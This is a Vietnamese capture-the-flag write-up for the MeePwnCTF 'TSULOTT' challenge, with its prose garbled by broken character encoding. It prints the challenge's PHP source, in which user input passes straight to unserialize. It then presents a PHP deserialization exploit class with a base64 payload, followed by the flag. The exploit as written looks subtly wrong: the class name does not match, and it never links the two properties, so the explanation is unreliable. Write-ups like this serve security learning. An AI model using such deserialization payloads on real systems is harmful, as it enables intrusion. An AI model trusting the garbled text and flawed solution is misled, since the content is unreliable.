๐Ÿ’‰TSULOTT

Easy

Overview

Vร o ฤ‘แบงu chรบng ta sแบฝ cรณ hai trฦฐแปng inpit nhแบญp vร o, nhแบญp code cแปงa bแบกn ฤ‘แปƒ nhแบญn win jackpot vร  nhแบญp 6 sแป‘ ฤ‘แปƒ lแบฅy code.

แปž ฤ‘รขy chรบng ta sแบฝ nhแบญp ฤ‘แบกi gรฌ ฤ‘รณ nhฦฐng chรบng ta sแบฝ nhแบญp แปŸ take code trฦฐแป›c rแป“i lแบฅy mแป™t chuแป—i base64 mร  trang ฤ‘ฦฐa ra rแป“i nรณ sแบฝ trแบฃ vแป kแบฟt quแบฃ nhฦฐ hรฌnh แปŸ dฦฐแป›i.

Analys

Sau mแป™t lรบc thรฌ chรบng ta xem source code hiแป‡n tแบกi cรณ gรฌ ctrl+U

แปž ฤ‘รขy cรณ gแปฃi รฝ cho chรบng ta lร  GET/?is_debug=1 sau khi nhแบญp vร o chรบng ta sแบฝ cรณ source code cแปงa bร i nhฦฐ sau:

<body>
<style>
input[type=text] {
    width: 40%;
    padding: 12px 20px;
    margin: 8px 0;
    box-sizing: border-box;
    border: 2px solid red;
    background-color: #ebfff8;
    border-radius: 4px;
}

button[type=submit] {
    width: 10%;
    background-color: #F94848;
    color: white;
    padding: 14px 20px;
    margin: 8px 0;
    border: none;
    border-radius: 4px;
    cursor: pointer;
}

button[type=submit]:hover {
    background-color: #45a049;
}

body {
    background-image: url("money.jpg");
}
</style>

<?php
class Object 
{ 
  var $jackpot;
  var $enter; 
}
?>


<?php

include('secret.php');

if(isset($_GET['input']))  
{
  $obj = unserialize(base64_decode($_GET['input']));
  if($obj)
  {
    $obj->jackpot = rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99); 
    if($obj->enter === $obj->jackpot)
    {
      echo "<center><strong><font color='white'>CONGRATULATION! You Won JACKPOT PriZe !!! </font></strong></center>". "<br><center><strong><font color='white' size='20'>".$obj->jackpot."</font></strong></center>";
      echo "<br><center><strong><font color='green' size='25'>".$flag."</font></strong></center><br>";
      echo "<center><img src='http://www.relatably.com/m/img/cross-memes/5378589.jpg' /></center>";

    }
    else
    {
      echo "<br><br><center><strong><font color='white'>Wrong! True Six Numbers Are: </font></strong></center>". "<br><center><strong><font color='white' size='25'>".$obj->jackpot."</font></strong></center><br>";
    }
  }
  else
  {
    echo "<center><strong><font color='white'>- Something wrong, do not hack us please! -</font></strong></center>";
  }
}
else
{
  echo "";
}
?>
<center>
<br><h2><font color='yellow' size=8>-- TSU</font><font color='red' size=8>LOTT --</font></h2>
<p><p><font color='white'>Input your code to win jackpot!</font><p>
<form>
          <input type="text" name="input" /><p><p>
          <button type="submit" name="btn-submit" value="go">send</button>
</form>
</center>
<?php
if (isset($_GET['gen_code']) && !empty($_GET['gen_code']))
{
  $temp = new Object;
  $temp->enter=$_GET['gen_code'];
  $code=base64_encode(serialize($temp)); 
  echo '<center><font color=\'white\'>Here is your code, please use it to Lott: <strong>'.$code.'</strong></font></center>';
}
?>
<center>
<font color='white'>-----------------------------------------------------------------------------------------------------------------------------</font>
<h3><font color='white'>Take code</font></h3><p>
<p><font color='white'>Pick your six numbers (Ex: 15 02 94 11 88 76)</font><p>
<form>
      <input type="text" name="gen_code" maxlength="17" /><p><p>
      <button type="submit" name="btn-submit" value="go">send</button>
</form>
</center>
<!-- debug: GET is_debug=1 -->
<?php
if(isset($_GET['is_debug']) && $_GET['is_debug']==='1')
{
   show_source(__FILE__);
}
?>
</body>

Chรบng ta sแบฝ chรบ รฝ tแป›i hai ฤ‘oแบกn code PHP nhฦฐ sau:

<?php
class Object 
{ 
  var $jackpot;
  var $enter; 
}
?>


<?php

include('secret.php');

if(isset($_GET['input']))  
{
  $obj = unserialize(base64_decode($_GET['input']));
  if($obj)
  {
    $obj->jackpot = rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99); 
    if($obj->enter === $obj->jackpot)
    {
      echo "<center><strong><font color='white'>CONGRATULATION! You Won JACKPOT PriZe !!! </font></strong></center>". "<br><center><strong><font color='white' size='20'>".$obj->jackpot."</font></strong></center>";
      echo "<br><center><strong><font color='green' size='25'>".$flag."</font></strong></center><br>";
      echo "<center><img src='http://www.relatably.com/m/img/cross-memes/5378589.jpg' /></center>";

    }
    else
    {
      echo "<br><br><center><strong><font color='white'>Wrong! True Six Numbers Are: </font></strong></center>". "<br><center><strong><font color='white' size='25'>".$obj->jackpot."</font></strong></center><br>";
    }
  }
  else
  {
    echo "<center><strong><font color='white'>- Something wrong, do not hack us please! -</font></strong></center>";
  }
}
else
{
  echo "";
}
?>

ฤoแบกn code php thแปฉ nhแบฅt cรณ mแป™t class Object cรณ hai thuแป™c tรญnh lร  jackpot vร  enter.

Tiแบฟp theo chรบ รฝ tแป›i dรฒng 16 nรณ sแบฝ unserialize ฤ‘oแบกn code khi nhแบญp input vร o, vร  nรณ ฤ‘ฦฐแปฃc gรกn biแบฟn $obj. Tiแบฟp theo nรณ kiแปƒm tra cรณ $obj khรดng thรฌ nรณ sแบฝ random jackpot thร nh 6 sแป‘ vร  random tแปซ 10-99 cรกch nhau ra.

Cuแป‘i cรนng thuแป™c tรญnh enter mร  bแบฑng jackpot thรฌ cรณ thแปƒ cรณ flag

แปž dฦฐแป›i cรณ thรชm ฤ‘oแบกn code serialize nแป™i dung code chรบng ta nhแบญp แปŸ dฦฐแป›i.

Tรณm lแบกi khi nร y chรบng ta nhแบญn ra ฤ‘รขy lร  PHP Deserialization khi ฤ‘รณ chรบng ta cรณ thแปƒ control cแบฃ class Object trรชn bแบฑng cรกch ghi ฤ‘รจ nรณ ฤ‘แปƒ hai thuแป™c tรญch jackpot vร  enter bแบฑng nhau.

Exploit

ร tฦฐแปŸng bรขy giแป chรบng ta sแบฝ xรขy dแปฑng lแบกi class Object giแป‘ng nhฦฐ trรชn vร  khแปŸi tแบกo hร m __constructor cho hai thuแป™c tรญnh bแบฑng nhau.

<?php
class Exploit
{
    var $jackpot;
    var $enter;

    public function __construct()
    {
        $this->jackpot=$this->enter;
    }

}
$code = new Exploit();
echo base64_encode(serialize($code));
//Tzo3OiJFeHBsb2l0IjoyOntzOjc6ImphY2twb3QiO047czo1OiJlbnRlciI7Tjt9

Flag: MeePwnCTF{__OMG!!!__Y0u_Are_Milli0naire_N0ww!!___}

Last updated